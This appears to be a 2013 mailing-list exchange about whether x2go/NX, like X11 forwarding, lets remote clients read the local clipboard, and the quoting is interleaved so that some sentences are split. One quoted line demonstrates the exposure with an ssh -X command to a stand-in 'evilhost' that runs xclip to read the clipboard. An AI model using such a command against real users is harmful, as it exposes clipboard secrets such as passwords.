On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: this as well... like as if Gentoo would say "if Debian breaks their
Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this. Well but that "argument" doesn't really count:
- Just because others do it plainly insecure, you cannot do it like
OpenSSL entropy, we should do so, too"... o.O
- Literally no one who has a decent mind of security, will allow other hosts do directly access their X server.. because then you're (security wise) anyway screwed... And I thought NX would secure what's sent from remote in order to not being able to overtake the input/output devices of the hosts (whole) Xserver).
I disagree, this is not a hole at all, it works as intended. Its just that users are often not educated about the implications of passing around passwords via the clipboard etc. Na I disagree... if even people would be educated (which is not realistic) it will happen by accident, that you copy sensitive information... sometimes other programs may do this even automatically and you can't to anything against.
Cheers, Chris.